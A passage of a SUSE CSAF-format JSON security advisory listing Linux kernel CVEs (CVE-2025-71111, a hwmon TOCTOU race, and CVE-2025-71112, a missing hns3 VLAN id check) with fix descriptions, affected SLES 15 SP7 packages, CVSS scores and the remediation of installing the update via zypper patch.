"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71108"
},
{
"cve": "CVE-2025-71111",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71111"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (w83791d) Convert macros to functions to avoid TOCTOU\n\nThe macro FAN_FROM_REG evaluates its arguments multiple times. When used\nin lockless contexts involving shared driver data, this leads to\nTime-of-Check to Time-of-Use (TOCTOU) race conditions, potentially\ncausing divide-by-zero errors.\n\nConvert the macro to a static function. This guarantees that arguments\nare evaluated only once (pass-by-value), preventing the race\nconditions.\n\nAdditionally, in store_fan_div, move the calculation of the minimum\nlimit inside the update lock. This ensures that the read-modify-write\nsequence operates on consistent data.\n\nAdhere to the principle of minimal changes by only converting macros\nthat evaluate arguments multiple times and are used in lockless\ncontexts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71111",
"url": "https://www.suse.com/security/cve/CVE-2025-71111"
},
{
"category": "external",
"summary": "SUSE Bug 1256728 for CVE-2025-71111",
"url": "https://bugzilla.suse.com/1256728"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71111"
},
{
"cve": "CVE-2025-71112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: add VLAN id validation before using\n\nCurrently, the VLAN id may be used without validation when\nreceive a VLAN configuration mailbox from VF. The length of\nvlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause\nout-of-bounds memory access once the VLAN id is bigger than\nor equal to VLAN_N_VID.\n\nTherefore, VLAN id needs to be checked to ensure it is within\nthe range of VLAN_N_VID.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
